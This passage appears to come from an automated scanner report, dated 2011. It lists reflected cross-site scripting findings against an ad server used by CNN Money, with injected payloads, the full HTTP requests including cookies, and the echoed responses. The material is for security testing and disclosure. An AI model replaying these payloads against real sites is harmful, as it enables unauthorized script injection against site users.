This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204fcb93"-alert(1)-"6cd1cf6a25f&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2821

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909479**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204fcb93"-alert(1)-"6cd1cf6a25f&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604
...[SNIP]...

1.65. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the TargetID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7003a"><script>alert(1)</script>66a223f4a71 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=52047003a"><script>alert(1)</script>66a223f4a71&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2851

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=52047003a"><script>alert(1)</script>66a223f4a71&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604
...[SNIP]...

1.66. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Values parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the Values request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e210"><script>alert(1)</script>c51e3af3ea2 was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=15893e210"><script>alert(1)</script>c51e3af3ea2&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2851

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=15893e210"><script>alert(1)</script>c51e3af3ea2&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.67. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Values parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72eaa"-alert(1)-"89a1f1cf7b8 was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=158972eaa"-alert(1)-"89a1f1cf7b8&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2821

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=158972eaa"-alert(1)-"89a1f1cf7b8&Redirect=">
...[SNIP]...

1.68. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d7ff"-alert(1)-"682d290d23b was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click9d7ff"-alert(1)-"682d290d23b&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2821

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
pt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909458**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click9d7ff"-alert(1)-"682d290d23b&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703
...[SNIP]...

1.69. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 152b6"><script>alert(1)</script>0c1b3a46233 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click152b6"><script>alert(1)</script>0c1b3a46233&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2851

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<a href="http://ads.cnn.com/event.ng/Type=click152b6"><script>alert(1)</script>0c1b3a46233&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703
...[SNIP]...

1.70. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d09d"-alert(1)-"2fada7ea045 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=&7d09d"-alert(1)-"2fada7ea045=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:45:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2827

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
3852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=&7d09d"-alert(1)-"2fada7ea045=1">
...[SNIP]...

1.71. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92b34"><script>alert(1)</script>0a6691a4519 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=&92b34"><script>alert(1)</script>0a6691a4519=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:45:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2857

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
3852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=&92b34"><script>alert(1)</script>0a6691a4519=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.72. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**

Issue detail

The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef1c1'-alert(1)-'15cd63af330 was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click=http://ads.cnn.com/event.ng/Type=clickef1c1'-alert(1)-'15cd63af330&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:42:13 GMT; path=/
Set-Cookie: i_1=25:1538:134:113:0:42421:1300909333:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L; expires=Fri, 22-Apr-2011 19:42:13 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 838

   function wsod_image1538() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=clickef1c1'-alert(1)-'15cd63af330&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,4
...[SNIP]...

1.73. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [AdID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60b5f'-alert(1)-'19e5a4bf28e was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

